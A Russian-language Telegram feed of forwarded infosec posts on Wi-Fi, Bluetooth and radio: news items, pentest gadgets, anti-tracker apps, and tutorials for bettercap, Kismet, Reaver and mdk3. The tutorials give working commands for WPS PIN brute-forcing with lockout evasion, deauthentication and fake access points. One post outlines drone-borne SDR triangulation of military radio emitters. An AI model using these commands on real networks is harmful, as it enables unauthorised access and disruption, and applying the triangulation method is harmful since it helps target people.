Forwarded from infosec
• Учёные разработали гибридную технологию - WiLo (Wi-Fi + LoRa), которая продемонстрировала на 96% успешную передачу данных на расстоянии до 500 метров. Преимуществом такой технологии станет возможность её работы на уже существующем оборудовании. Однако для одновременной работы Wi-Fi и эмуляции сигналов LoRa устройства потребляют больше энергии. Учёные планируют решить эту проблему, оптимизировав энергоэффективность, скорость передачи данных и устойчивость WiLo к помехам.
• Видимо следующим шагом станет дальнейшая оптимизация системы, а также тестирование WiLo в различных условиях IoT, в том числе систем датчиков для умных городов, где требуется передача данных на большие расстояния с минимальным энергопотреблением.
• Напомню, что в сентябре компания Morse Micro установила новый мировой рекорд дальности действия Wi-Fi, используя стандарт HaLow (802.11ah). В ходе эксперимента в сельском национальном парке Джошуа-Три удалось установить связь на расстоянии 15,9 км.
#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Forwarded from S.E.Reborn
• Очень объемное руководство, которое поможет вам разобраться в основах работы Wi-Fi:
#CheatSheet #WiFi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Интернет-Розыск
Основные способы взлома Wi-Fi. Использовать только в образовательных целях.
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Forwarded from Codeby
Мощная, легко расширяемая платформа, написанная на
Установка в
sudo apt update && sudo apt install bettercap
Установка via
docker pull bettercap/dev
docker run -it --privileged --net=host bettercap/dev -h
Запуск Web UI и интерактивной сессии:
sudo bettercap -caplet http-ui
sudo bettercap
Стандартные данные для входа:
Логин: user
Пароль: pass
Возможности:
Сканирование WiFi сетей, деаутентификация клиентов
Авто захват рукопожатий
Bluetooth сканирование
ARP, DNS, NDP and DHCPv6 спуферы для MitM атак
Мощный сетевой сниффер
Быстрый сканер портов
Удобный веб интерфейс
И многое другое
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
Forwarded from OSINT | Информационная разведка | Информационная безопасность
Итак, немного теории по триангуляцию и методе ее реализации. Для этого метода потребуется синхронизация SDR-ов (тех же 700 рублевых приемников) посредством GPS – прием точных меток времени. Метод избитый. Просто опишу его на языке домовладельцев. При появлении сигнала, разбросанные в разной географии приемники будут принимать сигналы с разным времени задержки, по сути - время прихода сигналов можно выразить в расстояние. Которые, графически представляется в форме кругов. Пересечение кругов даст географию объектов. Беда данного метода, это распространение УКВ сигналов, на которых работают боевые бригады - только в прямой видимости. Но ничто не мешает запустить несколько бензо-дронов с соответствующим оборудованием и математикой. Даже 5км высоты даст обзор почти в 300км. Реализация данного способа несложная и недорогая, особенно если применить особенности местности. Еще один забавный факт. Существует ресурс с КВ-приемниками KiwiSDR, до всей заварушки, можно было очень точно определить источник сигнала, поскольку приемники были засинхренены GPS. Но потом, все по понятным причинам прикрыли.
👍5
Forwarded from SecurityLab.ru
SMS-охотники: в Таиланде поймали фургон с фишинговой станцией
📥 В Бангкоке полиция обнаружила передвижную станцию для массовой рассылки фишинговых SMS. Устройство, находившееся в фургоне, могло отправлять более 100 тысяч сообщений в час в радиусе трёх километров.
💳 Мошенники использовали схему с фальшивыми бонусными баллами, маскируясь под крупного оператора AIS. Жертв перенаправляли на фишинговый сайт, где похищали данные банковских карт для проведения несанкционированных транзакций.
💬 Преступники координировали свои действия через закрытые каналы в Telegram, где обсуждали тексты мошеннических сообщений. Полиция арестовала водителя фургона — 35-летнего гражданина Китая, и разыскивает ещё минимум двух участников группы.
#фишинг #кибербезопасность #Таиланд #мошенничество
@SecLabNews
#фишинг #кибербезопасность #Таиланд #мошенничество
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
100 000 SMS в час: в Бангкоке задержан передвижной центр мошенников
Как мошенники рассылают миллионы SMS-сообщений без риска попасться полиции.
Forwarded from Evil Wireless Man
Если вы вдруг еще не слышали, то слушайте ;)
Через 40 минут стартует трансляция NextHop 2024.
Доклады про Wi-Fi тоже будут.
Подключайтесь.
Через 40 минут стартует трансляция NextHop 2024.
Доклады про Wi-Fi тоже будут.
Подключайтесь.
Мероприятия | Yandex Infrastructure
nexthop 2024 — конференция по сетевым технологиям
Ежегодная конференция Yandex Infrastructure по сетевым технологиям. Актуальные вопросы архитектуры, сетевой разработки, работы с инцидентами и многое другое.
👍3
Forwarded from Social Engineering
📦 PwnBox: реализуем устройство для пентеста Wi-Fi сетей.
• Автор этого репозитория собрал устройство, которое отлично подходит для пентеста Wi-Fi сетей. Реализация включает в себя несколько донглов от Alfa, Raspberry Pi, соответствующее ПО и адаптер от BrosTrend. Несмотря на то, что данной реализации уже достаточно лет, логика и схема для создания подобного устройства остается прежней, нужно только поменять донглы от Альфы на наиболее подходящие...
• Кстати, знаете почему вардрайвинга советуют донглы от Alfa Networks? Этот производитель специализируется на беспроводном оборудовании, причем делает его чуть лучше (и дороже) других. Например, во многих адаптерах встречается экранирование (повышает чувствительность приемника) или встроенный усилитель (увеличивает пиковую мощность передатчика). Почти все модели оснащены съемными антеннами (мы можем прикрутить свою, более подходящую). Для удобства выбора есть даже специальный раздел Kali WiFi USB, где указаны адаптеры, гарантированно работающие в Kali Linux в режиме мониторинга. В общем и целом, Альфа - это как бывшая cisco для админов.
➡ https://github.com/koutto/pi-pwnbox
• Дополнительно:
➡ Анализ безопасности Wi-Fi: подробное исследование методологии взлома протоколов WPA2-Personal / Enterprise и WPA3 (какие атаки и уязвимости существуют, и какой инструментарий применяется для их эксплуатации);
➡ Пентест Wi-Fi: полезный чек-лист, который содержит актуальные советы и хитрости на тему пентеста Wi-Fi сетей;
➡ Инструменты для пентеста Wi-Fi: продолжение поста выше, статья включает в себя максимально полный список инструментов для анализа защищенности Wi-Fi;
➡ Useful Wireless Links: учебные пособия, справочники, калькуляторы, софт, гаджеты и многое другое.
S.E. ▪️ infosec.work ▪️ VT
• Автор этого репозитория собрал устройство, которое отлично подходит для пентеста Wi-Fi сетей. Реализация включает в себя несколько донглов от Alfa, Raspberry Pi, соответствующее ПО и адаптер от BrosTrend. Несмотря на то, что данной реализации уже достаточно лет, логика и схема для создания подобного устройства остается прежней, нужно только поменять донглы от Альфы на наиболее подходящие...
• Кстати, знаете почему вардрайвинга советуют донглы от Alfa Networks? Этот производитель специализируется на беспроводном оборудовании, причем делает его чуть лучше (и дороже) других. Например, во многих адаптерах встречается экранирование (повышает чувствительность приемника) или встроенный усилитель (увеличивает пиковую мощность передатчика). Почти все модели оснащены съемными антеннами (мы можем прикрутить свою, более подходящую). Для удобства выбора есть даже специальный раздел Kali WiFi USB, где указаны адаптеры, гарантированно работающие в Kali Linux в режиме мониторинга. В общем и целом, Альфа - это как бывшая cisco для админов.
• Дополнительно:
S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from S.E.Book
• 20 апреля 2021 года на презентации Apple был представлен очень интересный девайс — Apple AirTag. Идея таких Bluetooth-трекеров заключается в том, что они помогают нам в повседневной деятельности (искать предметы, которые вы успешно забыли где-либо). Как это работает? При помощи технологии Bluetooth различные девайсы экосистемы Apple определяют наличие метки поблизости и передают примерные или точные координаты в вашу учетную запись Apple. При помощи сервиса Apple Find My вы можете посмотреть, куда в итоге попала ваша вещь — в бюро находок или к новому владельцу. Самое главное, что все это происходит автоматически, и даже устанавливать ничего не надо. Все нужное для работы системы поиска AirTag уже встроено в iOS у сотен миллионов пользователей.
• Так вот, это я к тому, что когда данный девайс поступил в продажу, то люди начали следить за другими людьми с помощью AirTag. Спустя год и несколько громких дел Apple догадались выпустить обновление для своих устройств и реализовали оповещения, которые информируют человека о том, что рядом находится метка AirTag.
• Но ведь помимо AirTag в мире существует сотни других маячков, не так ли? И есть достаточно популярные устройства, которые никак не связаны с экосистемами по типу Samsung или Apple. Как в таком случае защититься от слежки? Такие решения есть! Еще и с открытым исходным кодом и для вашего #Android:
• AirGuard и MetaRadar: оба инструмента работают по следующему принципу — сканируют частоты, на которых работают Bluetooth-трекеры, а приложения определяют те идентификаторы, которые находятся постоянно с вами (наушники, часы, браслеты, которые принадлежат вам). Как только появляется новое устройство перемещающиеся с вами (порог срабатывания выставляется либо вручную, либо по умолчанию фиксируется 3 появления в зоне присутствия смартфона) приложения начинают вас информировать о неизвестном устройстве и показывают отметку на карте, где оно было зафиксировано. В среднем обнаружение может занимать от 30 минут до 3х часов. Пользуйтесь!
#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
Apple
AirTag
Attach AirTag to everyday items, like your keys or a backpack, to easily keep track of them in the Find My app.
Forwarded from S.E.Book
• История Bluetooth началась ещё в 1994 году: сотрудники компании Ericsson, занимающейся производством телекоммуникационного оборудования, начали искать способ передачи данных без использования кабелей. Через четыре года сформировалась специальная группа инженеров — Bluetooth SIG. В нее вошли специалисты не только из Ericsson, но и из других заинтересованных в технологии компаний: IBM, Intel, Toshiba и Nokia. Вместе они создали первую версию блютуз — она вышла в 1998 году.
• Свое необычное название, которое в переводе с английского означает «синий зуб», новая технология получила в честь датского и норвежского короля, правившего в X веке. Главная заслуга Харальда I — объединение разрозненных и враждующих племен в единое королевство. Но прозвище он получил благодаря темному цвету зубов: в истории он остался Синезубым. Технология объединяет разные устройства, обеспечивает связь между ними, как когда-то король викингов объединил разные племена. Название для нового способа беспроводной связи предложил сотрудник компании Intel Джим Кардаш.
• После 1998 года Bluetooth продолжил развиваться, менялись технологии, связь становилась лучше. Вот некоторые особенности каждой версии:
- Bluetooth 1.0 (1998): при работе с этой версией было сложно соединить устройства разных производителей. Также подключение требовало обмена адресами устройств, делая анонимность невозможной. Качество сигнала было нестабильным, связь часто прерывалась.
- Bluetooth 2.0 (2004): главная особенность версии — ускорение передачи данных с помощью технологии EDR. Производитель заявил о повышении скорости до 3 Мбит/с, но на практике она достигала только 2,1 Мбит/с. По сравнению с первой версией это было существенное улучшение, и при этом версии остались совместимыми. Также стало проще подключать сразу несколько устройств и снизилось потребление энергии.
- Bluetooth 3.0 (2009): для передачи данных при этом стандарте использовали два канала: один поддерживал скорость до 3 Мбит/с, второй — до 24 Мбит/с. Выбор канала зависел от размера файлов: большие передавали по более высокоскоростному. Такое разделение позволяло еще больше снизить потребление энергии.
- Bluetooth 4.0 (2010): данная версия технологии объединила в себе три протокола: классический Bluetooth, высокоскоростной, основанный на Wi-Fi, и с низким энергопотреблением для небольших датчиков носимых устройств.
- Bluetooth 5.0 (2016): по сравнению с 4.0 скорость выросла в два раза, а радиус действия — в четыре.
- Bluetooth 6.0 (2024): главной особенностью стала возможность определить расстояние между устройствами с точностью до сантиметра, что открывает для разработчиков много новых сценариев для использования подключаемых устройств. Описание других нововведений можно найти на хабре, либо на официальном сайте.
#Разное #Bluetooth
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Forwarded from S.E.Book
• Разработчик и студент Дрезденского технического университета под ником ZitaoTech представил открытый проект Hackberry-Pi_Zero, включая 3D-модель корпуса и электрическую схему под лицензией MIT.
• Это карманный терминал #Linux на базе микрокомпьютера Raspberry Pi Zero 2W (чип Broadcom BCM2710A1 с четырьмя ядрами Cortex-A53 с рабочей частотой 1 ГГц, объём памяти 512 МБ ОЗУ LPDDR2 SDRAM) с 4" TFT-дисплеем разрешением 720х720 пикселей, оригинальной клавиатурой BlackBerry (Фото 1, модель Q10 или Q20) и питающийся от двух стандартных АКБ (фото 2) типа Nokia BL-5C.
• Следует отметить, что двойную сменную батарею можно поочерёдно заменить за 10 секунд, не отключая питание. Время работы батареи в режиме тестирования: 3,5 часа при использовании в качестве настольного компьютера, 5 часов в режиме работы в командной строке.
• Hackberry-Pi_Zero имеет 3 порта USB2.0, его можно использовать с USB-накопителем или модулем 4G Dongle или любым USB-устройством. Устройство имеет встроенный порт Stemma I2C, куда можно подключать любые датчики I2C. Гаджет имеет внешний слот для карты памяти типа TF.
• На Hackberry-Pi_Zero можно установить Kali Linux, Raspberrypi OS или Retropi и многие другие ОС на базе Linux. В готовом виде Hackberry-Pi_Zero можно приобрести (только без Nokia BL-5C) за $126 с клавиатурой BBQ10 или за $127 с клавиатурой BBQ20.
- Видеообзор устройства доступен на YT;
- Более подробное описание и вся необходимая информация есть на GitHub.
#Raspberry #Kali
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
Forwarded from Codeby
🔮Kismet: Магия Wi-Fi анализа для хакеров и исследователей
Kismet — это мощный анализатор сети Wi-Fi с открытым исходным кодом, который позволяет исследовать и отслеживать радиочастотное пространство.
С помощью Kismet можно не только анализировать трафик, но и заниматься разведкой на более глубоком уровне, включая мониторинг нестандартных частот и анализ помех.
1️⃣ Установка
Для начала вам нужно установить Kismet. Процесс зависит от операционной системы. Например, на Linux:
После установки убедитесь, что ваше устройство поддерживает мониторинг беспроводных сетей. Например, для некоторых карт потребуется установка дополнительных драйверов.
2️⃣ Запуск программы
Откройте терминал и запустите Kismet:
Программа откроется в текстовом интерфейсе, где вам предстоит настроить параметры.
3️⃣ Сканирование сетей
После запуска Kismet начнёт сканировать все доступные Wi-Fi сети вокруг вас. Он покажет вам список точек доступа, включая их SSID (имя сети), MAC-адреса, каналы и типы шифрования.
В Kismet также отображаются скрытые сети, которые не транслируют свои имена, но всё равно могут быть обнаружены.
4️⃣ Анализ пакетов
Kismet позволяет вам «ловить» пакеты, передаваемые через эти сети. Вы можете увидеть, какие данные проходят через вашу сеть, а также анализировать их для потенциальных уязвимостей.
Для анализа трафика достаточно запустить захват пакетов. После этого вы сможете увидеть различные данные, включая протоколы, используемые в передаче, количество переданных байтов и другие характеристики.
🧙Пример использования
Если вы подозреваете, что кто-то подключился к вашей сети, используйте Kismet:
1️⃣ Запустите Kismet и начните сканирование.
2️⃣ Выберите вашу сеть и просмотрите список подключённых устройств.
3️⃣ Проверьте MAC-адреса на наличие незнакомых устройств.
Kismet — это мощный анализатор сети Wi-Fi с открытым исходным кодом, который позволяет исследовать и отслеживать радиочастотное пространство.
С помощью Kismet можно не только анализировать трафик, но и заниматься разведкой на более глубоком уровне, включая мониторинг нестандартных частот и анализ помех.
Для начала вам нужно установить Kismet. Процесс зависит от операционной системы. Например, на Linux:
sudo apt-get install kismet
После установки убедитесь, что ваше устройство поддерживает мониторинг беспроводных сетей. Например, для некоторых карт потребуется установка дополнительных драйверов.
Откройте терминал и запустите Kismet:
sudo kismet
Программа откроется в текстовом интерфейсе, где вам предстоит настроить параметры.
После запуска Kismet начнёт сканировать все доступные Wi-Fi сети вокруг вас. Он покажет вам список точек доступа, включая их SSID (имя сети), MAC-адреса, каналы и типы шифрования.
В Kismet также отображаются скрытые сети, которые не транслируют свои имена, но всё равно могут быть обнаружены.
Kismet позволяет вам «ловить» пакеты, передаваемые через эти сети. Вы можете увидеть, какие данные проходят через вашу сеть, а также анализировать их для потенциальных уязвимостей.
Для анализа трафика достаточно запустить захват пакетов. После этого вы сможете увидеть различные данные, включая протоколы, используемые в передаче, количество переданных байтов и другие характеристики.
🧙Пример использования
Если вы подозреваете, что кто-то подключился к вашей сети, используйте Kismet:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Forwarded from Open Source
This media is not supported in your browser
VIEW IN TELEGRAM
retrogram plutosdr
retrogram plutosdr — это анализатор широкополосного радио спектра, который предоставляет пользователям возможность работы через терминал или SSH-консоль с использованием ASCII-арта.
Функциями можно управлять с помощью клавиатурных команд.
С помощью этого инструмента пользователи могут настраивать частоту, скорость выборки, полосу пропускания и уровень усиления.
https://github.com/r4d10n/retrogram-plutosdr
================
👁 News | 👁 Soft | 👁 Gear | 👁 Links
retrogram plutosdr — это анализатор широкополосного радио спектра, который предоставляет пользователям возможность работы через терминал или SSH-консоль с использованием ASCII-арта.
Функциями можно управлять с помощью клавиатурных команд.
С помощью этого инструмента пользователи могут настраивать частоту, скорость выборки, полосу пропускания и уровень усиления.
https://github.com/r4d10n/retrogram-plutosdr
================
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
Forwarded from Evil Wireless Man
В BLE стеке ESP32 нашли бэкдор.
Куча недокументированных команд позволяющих манипулировать трафиком и даже исполнить в памяти вредоносный код.
https://www.bleepingcomputer.com/news/security/undocumented-backdoor-found-in-bluetooth-chip-used-by-a-billion-devices/
Куча недокументированных команд позволяющих манипулировать трафиком и даже исполнить в памяти вредоносный код.
https://www.bleepingcomputer.com/news/security/undocumented-backdoor-found-in-bluetooth-chip-used-by-a-billion-devices/
BleepingComputer
Undocumented commands found in Bluetooth chip used by a billion devices
The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains undocumented commands that could be leveraged for attacks.
Forwarded from Codeby
Reaver Fork t6x
➡️ Как работает Reaver?
Основной принцип работы Reaver заключается в переборе PIN-кодов WPS до нахождения правильного, что позволяет получить доступ к настройкам маршрутизатора и извлечь WPA/WPA2 пароль.
1️⃣ Идентификация цели
Перед началом атаки Reaver использует утилиту wash для поиска Wi-Fi сетей с включённой функцией WPS. Вы можете получить список доступных сетей, чтобы выбрать цель для тестирования.
2️⃣ Перебор PIN-кодов
Reaver последовательно отправляет PIN-коды к маршрутизатору, используя механизмы WPS. Атака разделяется на две части:
• Перебор первых 4 цифр PIN-кода.
• Перебор последних 3 цифр.
Такой подход значительно сокращает общее количество комбинаций.
3️⃣ Обход защит
Некоторые маршрутизаторы применяют защиту, блокируя WPS после нескольких попыток. Форк t6x добавляет функции, которые позволяют обходить эти механизмы:
• Задержки между попытками.
• Использование фальшивых MAC-адресов.
• Автоматическое возобновление атаки после блокировки.
4️⃣ Извлечение WPA/WPA2 пароля
После успешного подбора PIN, Reaver извлекает пароль сети, что позволяет подключиться к Wi-Fi.
➡️ Установка и настройка Reaver
Утилита устанавливается из исходного кода с GitHub
➡️ Пример использования wash и reaver
🔍 Сканирование сетей с помощью wash
-i - выбор интерфейса для сканирования
-с - выбор канала
-С - игнорирование ошибок контрольной суммы кадров
🦴 Пример использования reaver
-i - выбор интерфейса
-b - MAC адрес цели
-v - более подробный вывод процесса работы
Reaver WPS Fork t6x — это инструмент для проведения атак на WPS (Wi-Fi Protected Setup), который помогает находить слабости в Wi-Fi сетях с включённой функцией WPS. Этот форк улучшает оригинальную утилиту Reaver, добавляя стабильность, производительность и новые функции.
Основной принцип работы Reaver заключается в переборе PIN-кодов WPS до нахождения правильного, что позволяет получить доступ к настройкам маршрутизатора и извлечь WPA/WPA2 пароль.
Перед началом атаки Reaver использует утилиту wash для поиска Wi-Fi сетей с включённой функцией WPS. Вы можете получить список доступных сетей, чтобы выбрать цель для тестирования.
Reaver последовательно отправляет PIN-коды к маршрутизатору, используя механизмы WPS. Атака разделяется на две части:
• Перебор первых 4 цифр PIN-кода.
• Перебор последних 3 цифр.
Такой подход значительно сокращает общее количество комбинаций.
Некоторые маршрутизаторы применяют защиту, блокируя WPS после нескольких попыток. Форк t6x добавляет функции, которые позволяют обходить эти механизмы:
• Задержки между попытками.
• Использование фальшивых MAC-адресов.
• Автоматическое возобновление атаки после блокировки.
После успешного подбора PIN, Reaver извлекает пароль сети, что позволяет подключиться к Wi-Fi.
Утилита устанавливается из исходного кода с GitHub
sudo apt install build-essential libpcap-dev aircrack-ng git
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x/src
./configure
make
sudo make install
root@kali:~# wash -i wlan0mon -c 6 -C
BSSID Ch dBm WPS Lck Vendor ESSID
------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No Unknown ASUS
-i - выбор интерфейса для сканирования
-с - выбор канала
-С - игнорирование ошибок контрольной суммы кадров
root@kali:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
-i - выбор интерфейса
-b - MAC адрес цели
-v - более подробный вывод процесса работы
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Заметки Хакер
🖥 Репозиторий: Wi-Fi Cracking — взлома WPA/WPA2 Wi-Fi
Wi-Fi Cracking — репозиторий, в котором представлены методы тестирования безопасности сетей Wi-Fi, защищённых слабыми паролями (WPA/WPA2).
— Данный репозиторий помогает сетевым администраторам и специалистам по безопасности проверить надёжность собственных беспроводных сетей или сетей, которые разрешено тестировать.
⏺ Ссылка на GitHub (https://github.com/brannondorsey/wifi-cracking)
#WiFi #Network #Hacking
@hackernews_lib
Wi-Fi Cracking — репозиторий, в котором представлены методы тестирования безопасности сетей Wi-Fi, защищённых слабыми паролями (WPA/WPA2).
— Данный репозиторий помогает сетевым администраторам и специалистам по безопасности проверить надёжность собственных беспроводных сетей или сетей, которые разрешено тестировать.
⏺ Ссылка на GitHub (https://github.com/brannondorsey/wifi-cracking)
#WiFi #Network #Hacking
@hackernews_lib
👍2
Forwarded from GitHub Community
Retrogram plutosdr — анализатор широкополосного спектра на вашем терминале / ssh-консоли с иллюстрацией ASCII.
5️⃣ GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
Forwarded from Codeby
mdk3
MDK — это инструмент проверки концепции для эксплуатации распространенных уязвимостей Wi-Fi.
💡 Возможности:
⏺️ Брутфорс MAC фильтров.
⏺️ Перебор скрытых SSID (включая несколько небольших списков слов SSID).
⏺️ Проверка сетей на наличие слуха.
⏺️ Интеллектуальная аутентификация-DoS для заморозки точек доступа (с проверкой успешности).
⏺️ Отказ в обслуживании WPA TKIP.
⏺️ WDS Confusion — отключение крупномасштабных установок с несколькими точками доступа.
📎 Установка:
или
📌 Использование:
Метод атаки deauthentication:
Генерация трафика:
Сканирование сетей:
Создание поддельной точки доступа:
MDK — это инструмент проверки концепции для эксплуатации распространенных уязвимостей Wi-Fi.
sudo apt-get install mdk3
или
git clone https://github.com/charlesxsh/mdk3-master.git
cd mdk3-master
Метод атаки deauthentication:
mdk3 [INTERFACE] d -c 6 -b [MAC]
Генерация трафика:
mdk3 [INTERFACE] a -c 6
Сканирование сетей:
mdk3 [INTERFACE] s
Создание поддельной точки доступа:
mdk3 [INTERFACE] f -c 6 -e "FreeWIFI"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6